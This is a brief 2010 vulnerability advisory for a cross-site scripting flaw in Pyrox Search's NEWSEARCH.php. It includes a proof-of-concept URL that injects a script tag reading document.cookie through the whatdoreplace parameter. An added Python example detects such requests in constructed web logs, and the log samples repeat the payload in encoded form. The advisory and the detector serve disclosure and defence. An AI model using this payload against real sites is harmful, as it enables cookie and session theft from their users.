Pyrox Search Newsearch.PHP Whatdoreplace Cross-Site Scripting Vulnerability

A proof of concept has been provided:

XSS exploit:
http://[www.example.com]/[path]/NEWSEARCH.php?whatdoreplace=whatdoreplace%00<script>alert(document.cookie)</script>
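
Added example, not part of the original advisory: a Python check that scans web-server access logs for requests shaped like the proof of concept above, meaning a NUL byte or HTML metacharacters in the whatdoreplace parameter of NEWSEARCH.php. The log lines, IP addresses and the /search/ path are constructed for illustration, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /search/NEWSEARCH.php?whatdoreplace=cats HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /search/NEWSEARCH.php?whatdoreplace=whatdoreplace%00%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.7 - - [01/Jan/2010:10:00:09 +0000] "GET /search/newsearch.php?whatdoreplace=a%2500%253Cb%253E HTTP/1.1" 200 530',
    '203.0.113.8 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines):
    """Return (client_ip, reasons) for each flagged NEWSEARCH.php request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # Compare case-insensitively: the script name may be served in any case.
        if not url.path.lower().endswith("newsearch.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for raw in params.get("whatdoreplace", []):
            value = fully_decode(raw)
            reasons = []
            if "\x00" in value:
                reasons.append("nul-byte")
            if re.search(r"[<>]", value):
                reasons.append("html-metachar")
            if reasons:
                hits.append((line.split()[0], reasons))
    return hits


if __name__ == "__main__":
    for ip, reasons in suspicious_requests(SAMPLE_LOG):
        print(ip, ",".join(reasons))
```
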


 

Copyright 2010, SecurityFocus